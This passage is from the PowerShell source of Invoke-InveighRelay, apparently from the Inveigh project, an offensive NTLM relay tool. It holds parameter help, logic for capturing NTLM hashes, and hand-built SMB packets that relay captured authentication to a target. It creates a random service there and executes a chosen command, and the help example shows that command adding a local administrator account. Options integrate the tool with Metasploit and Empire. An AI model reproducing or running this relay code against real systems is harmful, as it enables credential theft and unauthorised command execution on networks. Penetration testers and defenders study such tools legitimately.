ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" -in the cert store. - -.PARAMETER HTTPSCertAppID -Specify a valid application GUID for use with the ceriticate. - -.PARAMETER HTTPSCertThumbprint -Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in -the current working directory and named Inveigh.pfx. - -.PARAMETER Challenge -Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a -random challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be -pulled from the SMB relay target. - -.PARAMETER MachineAccounts -Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. - -.PARAMETER WPADAuth -Default = NTLM: (Anonymous,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting -to Anonymous can prevent browser login prompts. - -.PARAMETER SMBRelayTarget -IP address of system to target for SMB relay. - -.PARAMETER SMBRelayCommand -Command to execute on SMB relay target. Use PowerShell character escapes where necessary. - -.PARAMETER SMBRelayUsernames -Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and -domain\username format. - -.PARAMETER SMBRelayAutoDisable -Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target. - -.PARAMETER SMBRelayNetworkTimeout -Default = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay -target after each packet is sent. - -.PARAMETER ConsoleOutput -Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to -ensure that it doesn't hang the shell. - -.PARAMETER FileOutput -Default = Disabled: (Y/N) Enable/Disable real time file output. - -.PARAMETER StatusOutput -Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. - -.PARAMETER OutputStreamOnly -Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if -running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the -various yellow warning messages if enabled. - -.PARAMETER OutputDir -Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must -also be enabled. - -.PARAMETER RunTime -(Integer) Set the run time duration in minutes. - -.PARAMETER ShowHelp -Default = Enabled: (Y/N) Enable/Disable the help messages at startup. - -.PARAMETER Tool -Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's -Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire - -.EXAMPLE -Invoke-InveighRelay -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Spring2016 /add && net localgroup administrators Dave /add" -Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay -target. - -.LINK -https://github.com/Kevin-Robertson/Inveigh -#> - -# Parameter default values can be modified in this section: -[CmdletBinding()] -param -( - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMBRelayAutoDisable="Y", - [parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][String]$WPADAuth="NTLM", - [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool="0", - [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir="", - [parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SMBRelayTarget ="", - [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge="", - [parameter(Mandatory=$false)][Array]$SMBRelayUsernames="", - [parameter(Mandatory=$false)][Int]$SMBRelayNetworkTimeout="", - [parameter(Mandatory=$false)][Int]$RunTime="", - [parameter(Mandatory=$true)][String]$SMBRelayCommand = "", - [parameter(Mandatory=$false)][String]$HTTPSCertAppID="00112233-4455-6677-8899-AABBCCDDEEFF", - [parameter(Mandatory=$false)][String]$HTTPSCertThumbprint="98c1d54840c5c12ced710758b6ee56cc62fa1f0d", - [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter -) - -if ($invalid_parameter) -{ - throw "$($invalid_parameter) is not a valid parameter." -} - -if(!$SMBRelayTarget) -{ - throw "You must specify an -SMBRelayTarget if enabling -SMBRelay" -} - -if(!$SMBRelayCommand) -{ - throw "You must specify an -SMBRelayCommand if enabling -SMBRelay" -} - -if(!$OutputDir) -{ - $output_directory = $PWD.Path -} -else -{ - $output_directory = $OutputDir -} - -if(!$inveigh) -{ - $global:inveigh = [HashTable]::Synchronized(@{}) - $inveigh.log = New-Object System.Collections.ArrayList - $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList - $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList - $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList - $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList - $inveigh.cleartext_list = New-Object System.Collections.ArrayList - $inveigh.IP_capture_list = New-Object System.Collections.ArrayList - $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList -} - -if($inveigh.HTTP_listener.IsListening) -{ - $inveigh.HTTP_listener.Stop() - $inveigh.HTTP_listener.Close() -} - -if(!$inveigh.running) -{ - $inveigh.console_queue = New-Object System.Collections.ArrayList - $inveigh.status_queue = New-Object System.Collections.ArrayList - $inveigh.log_file_queue = New-Object System.Collections.ArrayList - $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList - $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList - $inveigh.certificate_application_ID = $HTTPSCertAppID - $inveigh.certificate_thumbprint = $HTTPSCertThumbprint - $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList - $inveigh.console_output = $false - $inveigh.console_input = $true - $inveigh.file_output = $false - $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt" - $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt" - $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt" - $Inveigh.challenge = $Challenge -} - -$inveigh.relay_running = $true -$inveigh.SMB_relay_active_step = 0 -$inveigh.SMB_relay = $true - -if($StatusOutput -eq 'Y') -{ - $inveigh.status_output = $true -} -else -{ - $inveigh.status_output = $false -} - -if($OutputStreamOnly -eq 'Y') -{ - $inveigh.output_stream_only = $true -} -else -{ - $inveigh.output_stream_only = $false -} - -if($Tool -eq 1) # Metasploit Interactive Powershell -{ - $inveigh.tool = 1 - $inveigh.output_stream_only = $true - $inveigh.newline = "" - $ConsoleOutput = "N" -} -elseif($Tool -eq 2) # PowerShell Empire -{ - $inveigh.tool = 2 - $inveigh.output_stream_only = $true - $inveigh.console_input = $false - $inveigh.newline = "`n" - $ConsoleOutput = "Y" - $ShowHelp = "N" -} -else -{ - $inveigh.tool = 0 - $inveigh.newline = "" -} - -# Write startup messages -if(!$inveigh.running) -{ - $inveigh.status_queue.Add("Inveigh Relay started at $(Get-Date -format 's')") > $null - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay started")]) > $null - - if($HTTP -eq 'Y') - { - $inveigh.HTTP = $true - $inveigh.status_queue.Add("HTTP Capture Enabled") > $null - } - else - { - $inveigh.HTTP = $false - $inveigh.status_queue.Add("HTTP Capture Disabled") > $null - } - - if($HTTPS -eq 'Y') - { - - try - { - $inveigh.HTTPS = $true - $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") - $certificate_store.Open('ReadWrite') - $certificate = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 - $certificate.Import($PWD.Path + "\Inveigh.pfx") - $certificate_store.Add($certificate) - $certificate_store.Close() - $netsh_certhash = "certhash=" + $inveigh.certificate_thumbprint - $netsh_app_ID = "appid={" + $inveigh.certificate_application_ID + "}" - $netsh_arguments = @("http","add","sslcert","ipport=0.0.0.0:443",$netsh_certhash,$netsh_app_ID) - & "netsh" $netsh_arguments > $null - $inveigh.status_queue.Add("HTTPS Capture Enabled") > $null - } - catch - { - $certificate_store.Close() - $HTTPS="N" - $inveigh.HTTPS = $false - $inveigh.status_queue.Add("HTTPS Capture Disabled Due To Certificate Install Error") > $null - } - - } - else - { - $inveigh.status_queue.Add("HTTPS Capture Disabled") > $null - } - - if($Challenge) - { - $Inveigh.challenge = $challenge - $inveigh.status_queue.Add("NTLM Challenge = $Challenge") > $null - } - - if($MachineAccounts -eq 'N') - { - $inveigh.status_queue.Add("Ignoring Machine Accounts") > $null - $inveigh.machine_accounts = $false - } - else - { - $inveigh.machine_accounts = $true - } - - $inveigh.status_queue.Add("Force WPAD Authentication = $WPADAuth") > $null - - if($ConsoleOutput -eq 'Y') - { - $inveigh.status_queue.Add("Real Time Console Output Enabled") > $null - $inveigh.console_output = $true - } - else - { - - if($inveigh.tool -eq 1) - { - $inveigh.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null - } - else - { - $inveigh.status_queue.Add("Real Time Console Output Disabled") > $null - } - - } - - if($FileOutput -eq 'Y') - { - $inveigh.status_queue.Add("Real Time File Output Enabled") > $null - $inveigh.status_queue.Add("Output Directory = $output_directory") > $null - $inveigh.file_output = $true - } - else - { - $inveigh.status_queue.Add("Real Time File Output Disabled") > $null - } - - if($RunTime -eq 1) - { - $inveigh.status_queue.Add("Run Time = $RunTime Minute") > $null - } - elseif($RunTime -gt 1) - { - $inveigh.status_queue.Add("Run Time = $RunTime Minutes") > $null - } - -} - -$inveigh.status_queue.Add("SMB Relay Enabled") > $null -$inveigh.status_queue.Add("SMB Relay Target = $SMBRelayTarget") > $null - -if($SMBRelayUsernames) -{ - - if($SMBRelayUsernames.Count -eq 1) - { - $inveigh.status_queue.Add("SMB Relay Username = " + $SMBRelayUsernames -join ",") > $null - } - else - { - $inveigh.status_queue.Add("SMB Relay Usernames = " + $SMBRelayUsernames -join ",") > $null - } - -} - -if($SMBRelayAutoDisable -eq 'Y') -{ - $inveigh.status_queue.Add("SMB Relay Auto Disable Enabled") > $null -} -else -{ - $inveigh.status_queue.Add("SMB Relay Auto Disable Disabled") > $null -} - -if($SMBRelayNetworkTimeout) -{ - $inveigh.status_queue.Add("SMB Relay Network Timeout = $SMBRelayNetworkTimeout Seconds") > $null -} - -if($ShowHelp -eq 'Y') -{ - $inveigh.status_queue.Add("Use Get-Command -Noun Inveigh* to show available functions") > $null - $inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh") > $null - - if($inveigh.console_output) - { - $inveigh.status_queue.Add("Press any key to stop real time console output") > $null - } - -} - -if($inveigh.status_output) -{ - - while($inveigh.status_queue.Count -gt 0) - { - - if($inveigh.output_stream_only) - { - Write-Output($inveigh.status_queue[0] + $inveigh.newline) - $inveigh.status_queue.RemoveRange(0,1) - } - else - { - - switch ($inveigh.status_queue[0]) - { - - "Run Stop-Inveigh to stop Inveigh" - { - Write-Warning($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveRange(0,1) - } - - default - { - Write-Output($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveRange(0,1) - } - - } - - } - - } - -} - -$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id -$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID)) -$process_ID = $process_ID -replace "-00-00","" -[Byte[]] $inveigh.process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - -# Begin ScriptBlocks - -# Shared Basic functions ScriptBlock -$shared_basic_functions_scriptblock = -{ - function DataToUInt16($field) - { - [Array]::Reverse($field) - return [System.BitConverter]::ToUInt16($field,0) - } - - function DataToUInt32($field) - { - [Array]::Reverse($field) - return [System.BitConverter]::ToUInt32($field,0) - } - - function DataLength - { - param ([Int]$length_start,[Byte[]]$string_extract_data) - - $string_length = [System.BitConverter]::ToInt16($string_extract_data[$length_start..($length_start + 1)],0) - return $string_length - } - - function DataToString - { - param ([Int]$string_length,[Int]$string2_length,[Int]$string3_length,[Int]$string_start,[Byte[]]$string_extract_data) - - $string_data = [System.BitConverter]::ToString($string_extract_data[($string_start+$string2_length+$string3_length)..($string_start+$string_length+$string2_length+$string3_length - 1)]) - $string_data = $string_data -replace "-00","" - $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $string_extract = New-Object System.String ($string_data,0,$string_data.Length) - - return $string_extract - } -} - -# SMB NTLM functions ScriptBlock - function for parsing NTLM challenge/response -$SMB_NTLM_functions_scriptblock = -{ - function SMBNTLMChallenge - { - param ([Byte[]]$payload_bytes) - - $payload = [System.BitConverter]::ToString($payload_bytes) - $payload = $payload -replace "-","" - $NTLM_index = $payload.IndexOf("4E544C4D53535000") - - if($payload.SubString(($NTLM_index + 16),8) -eq "02000000") - { - $NTLM_challenge = $payload.SubString(($NTLM_index + 48),16) - } - - return $NTLM_challenge - } - -} - -# SMB Relay Challenge ScriptBlock - gathers NTLM server challenge from relay target -$SMB_relay_challenge_scriptblock = -{ - function SMBRelayChallenge - { - param ($SMB_relay_socket,$HTTP_request_bytes) - - if ($SMB_relay_socket) - { - $SMB_relay_challenge_stream = $SMB_relay_socket.GetStream() - } - - $SMB_relay_challenge_bytes = New-Object System.Byte[] 1024 - $i = 0 - - :SMB_relay_challenge_loop while ($i -lt 2) - { - - switch ($i) - { - - 0 - { - $SMB_relay_challenge_send = 0x00,0x00,0x00,0x2f,0xff,0x53,0x4d,0x42,0x72,0x00,0x00,0x00,0x00, - 0x18,0x01,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0xff,0xff + - $inveigh.process_ID_bytes + - 0x00,0x00,0x00,0x00,0x00,0x0c,0x00,0x02,0x4e,0x54,0x20,0x4c,0x4d, - 0x20,0x30,0x2e,0x31,0x32,0x00 - } - - 1 - { - $SMB_length_1 = '0x{0:X2}' -f ($HTTP_request_bytes.Length + 32) - $SMB_length_2 = '0x{0:X2}' -f ($HTTP_request_bytes.Length + 22) - $SMB_length_3 = '0x{0:X2}' -f ($HTTP_request_bytes.Length + 2) - $SMB_NTLMSSP_length = '0x{0:X2}' -f ($HTTP_request_bytes.Length) - $SMB_blob_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 34)) - $SMB_blob_length = $SMB_blob_length -replace "-00-00","" - $SMB_blob_length = $SMB_blob_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $SMB_byte_count = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 45)) - $SMB_byte_count = $SMB_byte_count -replace "-00-00","" - $SMB_byte_count = $SMB_byte_count.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $SMB_netbios_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 104)) - $SMB_netbios_length = $SMB_netbios_length -replace "-00-00","" - $SMB_netbios_length = $SMB_netbios_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - [Array]::Reverse($SMB_netbios_length) - - $SMB_relay_challenge_send = 0x00,0x00 + - $SMB_netbios_length + - 0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x01,0x48,0x00, - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff + - $inveigh.process_ID_bytes + - 0x00,0x00,0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00, - 0x01,0x00,0x00,0x00,0x00,0x00 + - $SMB_blob_length + - 0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80 + - $SMB_byte_count + - 0x60 + - $SMB_length_1 + - 0x06,0x06,0x2b,0x06,0x01,0x05,0x05,0x02,0xa0 + - $SMB_length_2 + - 0x30,0x3c,0xa0,0x0e,0x30,0x0c,0x06,0x0a,0x2b,0x06,0x01,0x04,0x01, - 0x82,0x37,0x02,0x02,0x0a,0xa2 + - $SMB_length_3 + - 0x04 + - $SMB_NTLMSSP_length + - $HTTP_request_bytes + - 0x55,0x6e,0x69,0x78,0x00,0x53,0x61,0x6d,0x62,0x61,0x00 - } - - } - - $SMB_relay_challenge_stream.Write($SMB_relay_challenge_send,0,$SMB_relay_challenge_send.Length) - $SMB_relay_challenge_stream.Flush() - - if($SMBRelayNetworkTimeout) - { - $SMB_relay_challenge_timeout = new-timespan -Seconds $SMBRelayNetworkTimeout - $SMB_relay_challenge_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() - - while(!$SMB_relay_challenge_stream.DataAvailable) - { - - if($SMB_relay_challenge_stopwatch.Elapsed -ge $SMB_relay_challenge_timeout) - { - $inveigh.console_queue.Add("SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")]) - $inveigh.SMB_relay_active_step = 0 - $SMB_relay_socket.Close() - break SMB_relay_challenge_loop - } - - } - - } - - $SMB_relay_challenge_stream.Read($SMB_relay_challenge_bytes,0,$SMB_relay_challenge_bytes.Length) - $i++ - } - - return $SMB_relay_challenge_bytes - } - -} - -# SMB Relay Response ScriptBlock - sends NTLM reponse to relay target -$SMB_relay_response_scriptblock = -{ - function SMBRelayResponse - { - param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_user_ID) - - $SMB_relay_response_bytes = New-Object System.Byte[] 1024 - - if ($SMB_relay_socket) - { - $SMB_relay_response_stream = $SMB_relay_socket.GetStream() - } - - $SMB_length_1 = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 12)) - $SMB_length_1 = $SMB_length_1 -replace "-00-00","" - $SMB_length_1 = $SMB_length_1.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $SMB_length_2 = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 8)) - $SMB_length_2 = $SMB_length_2 -replace "-00-00","" - $SMB_length_2 = $SMB_length_2.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $SMB_length_3 = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 4)) - $SMB_length_3 = $SMB_length_3 -replace "-00-00","" - $SMB_length_3 = $SMB_length_3.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $SMB_NTLMSSP_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length)) - $SMB_NTLMSSP_length = $SMB_NTLMSSP_length -replace "-00-00","" - $SMB_NTLMSSP_length = $SMB_NTLMSSP_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $SMB_blob_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 16)) - $SMB_blob_length = $SMB_blob_length -replace "-00-00","" - $SMB_blob_length = $SMB_blob_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $SMB_byte_count = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 27)) - $SMB_byte_count = $SMB_byte_count -replace "-00-00","" - $SMB_byte_count = $SMB_byte_count.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $SMB_netbios_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 86)) - $SMB_netbios_length = $SMB_netbios_length -replace "-00-00","" - $SMB_netbios_length = $SMB_netbios_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - [Array]::Reverse($SMB_length_1) - [Array]::Reverse($SMB_length_2) - [Array]::Reverse($SMB_length_3) - [Array]::Reverse($SMB_NTLMSSP_length) - [Array]::Reverse($SMB_netbios_length) - $j = 0 - - :SMB_relay_response_loop while ($j -lt 1) - { - $SMB_relay_response_send = 0x00,0x00 + - $SMB_netbios_length + - 0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x01,0x48,0x00,0x00,0x00, - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,0x01,0x00,0x00,0x00, - 0x00,0x00 + - $SMB_blob_length + - 0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80 + - $SMB_byte_count + - 0xa1,0x82 + - $SMB_length_1 + - 0x30,0x82 + - $SMB_length_2 + - 0xa2,0x82 + - $SMB_length_3 + - 0x04,0x82 + - $SMB_NTLMSSP_length + - $HTTP_request_bytes + - 0x55,0x6e,0x69,0x78,0x00,0x53,0x61,0x6d,0x62,0x61,0x00 - - $SMB_relay_response_stream.Write($SMB_relay_response_send,0,$SMB_relay_response_send.Length) - $SMB_relay_response_stream.Flush() - - if($SMBRelayNetworkTimeout) - { - $SMB_relay_response_timeout = New-Timespan -Seconds $SMBRelayNetworkTimeout - $SMB_relay_response_stopwatch = [Sustem.Diagnostics.Stopwatch]::StartNew() - - while(!$SMB_relay_response_stream.DataAvailable) - { - - if($SMB_relay_response_stopwatch.Elapsed -ge $SMB_relay_response_timeout) - { - $inveigh.console_queue.Add("SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")]) - $inveigh.SMB_relay_active_step = 0 - $SMB_relay_socket.Close() - break :SMB_relay_response_loop - } - - } - - } - - $SMB_relay_response_stream.Read($SMB_relay_response_bytes,0,$SMB_relay_response_bytes.Length) - $inveigh.SMB_relay_active_step = 2 - $j++ - } - - return $SMB_relay_response_bytes - } - -} - -# SMB Relay Execute ScriptBlock - executes command within authenticated SMB session -$SMB_relay_execute_scriptblock = -{ - function SMBRelayExecute - { - param ($SMB_relay_socket,$SMB_user_ID) - - if ($SMB_relay_socket) - { - $SMB_relay_execute_stream = $SMB_relay_socket.GetStream() - } - - $SMB_relay_failed = $false - $SMB_relay_execute_bytes = New-Object System.Byte[] 1024 - $SMB_service_random = [String]::Join("00-",(1..20 | ForEach-Object{"{0:X2}-" -f (Get-Random -Minimum 65 -Maximum 90)})) - $SMB_service = $SMB_service_random -replace "-00","" - $SMB_service = $SMB_service.Substring(0,$SMB_service.Length - 1) - $SMB_service = $SMB_service.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $SMB_service = New-Object System.String ($SMB_service,0,$SMB_service.Length) - $SMB_service_random += '00-00-00' - [Byte[]] $SMB_service_bytes = $SMB_service_random.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $SMB_referent_ID_bytes = [String](1..4 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) - $SMB_referent_ID_bytes = $SMB_referent_ID_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $SMBRelayCommand = "%COMSPEC% /C `"" + $SMBRelayCommand + "`"" - [System.Text.Encoding]::UTF8.GetBytes($SMBRelayCommand) | ForEach-Object{$SMB_relay_command += "{0:X2}-00-" -f $_} - - if([Bool]($SMBRelayCommand.Length % 2)) - { - $SMB_relay_command += '00-00' - } - else - { - $SMB_relay_command += '00-00-00-00' - } - - [Byte[]] $SMB_relay_command_bytes = $SMB_relay_command.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $SMB_service_data_length_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length + $SMB_service_bytes.Length + 237) - $SMB_service_data_length_bytes = $SMB_service_data_length_bytes[2..0] - $SMB_service_byte_count_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length + $SMB_service_bytes.Length + 174) - $SMB_service_byte_count_bytes = $SMB_service_byte_count_bytes[0..1] - $SMB_relay_command_length_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length / 2) - $k = 0 - - :SMB_relay_execute_loop while ($k -lt 12) - { - - switch ($k) - { - - 0 - { - $SMB_relay_execute_send = 0x00,0x00,0x00,0x45,0xff,0x53,0x4d,0x42,0x75,0x00,0x00,0x00,0x00, - 0x18,0x01,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0xff,0xff + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x00,0x00,0x04,0xff,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x1a,0x00, - 0x00,0x5c,0x5c,0x31,0x30,0x2e,0x31,0x30,0x2e,0x32,0x2e,0x31,0x30, - 0x32,0x5c,0x49,0x50,0x43,0x24,0x00,0x3f,0x3f,0x3f,0x3f,0x3f,0x00 - } - - 1 - { - $SMB_relay_execute_send = 0x00,0x00,0x00,0x5b,0xff,0x53,0x4d,0x42,0xa2,0x00,0x00,0x00,0x00, - 0x18,0x02,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0x00,0x08 + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x03,0x00,0x18,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x16,0x00,0x00, - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00, - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x01, - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x08, - 0x00,0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00 - } - - 2 - { - $SMB_relay_execute_send = 0x00,0x00,0x00,0x87,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00, - 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0x00,0x08 + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x04,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00, - 0xff,0xff,0xff,0xff,0x08,0x00,0x48,0x00,0x00,0x00,0x48,0x00,0x3f, - 0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x05,0x00,0x0b,0x03,0x10,0x00, - 0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x16,0xd0, - 0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00, - 0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38, - 0x00,0x10,0x03,0x02,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c, - 0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60,0x02,0x00,0x00, - 0x00 - - $SMB_multiplex_id = 0x05 - } - - 3 - { - $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest - } - - 4 - { - $SMB_relay_execute_send = 0x00,0x00,0x00,0x9b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00, - 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0x00,0x08 + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x06,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00, - 0xff,0xff,0xff,0xff,0x08,0x00,0x50,0x00,0x00,0x00,0x5c,0x00,0x3f, - 0x00,0x00,0x00,0x00,0x00,0x5c,0x00,0x05,0x00,0x00,0x03,0x10,0x00, - 0x00,0x00,0x5c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x38,0x00,0x00, - 0x00,0x00,0x00,0x0f,0x00,0x00,0x00,0x03,0x00,0x15,0x00,0x00,0x00, - 0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 + - $SMB_service_bytes + - 0x00,0x00,0x00,0x00,0x00,0x00,0x3f,0x00,0x0f,0x00 - - $SMB_multiplex_id = 0x07 - } - - 5 - { - $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest - } - - 6 - { - $SMB_relay_execute_send = [Array] 0x00 + - $SMB_service_data_length_bytes + - 0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28,0x00, - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08 + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x08,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00, - 0xff,0xff,0xff,0xff,0x08,0x00 + - $SMB_service_byte_count_bytes + - 0x00,0x00 + - $SMB_service_byte_count_bytes + - 0x3f,0x00,0x00,0x00,0x00,0x00 + - $SMB_service_byte_count_bytes + - 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00 + - $SMB_service_byte_count_bytes + - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0c, - 0x00 + - $SMB_context_handler + - 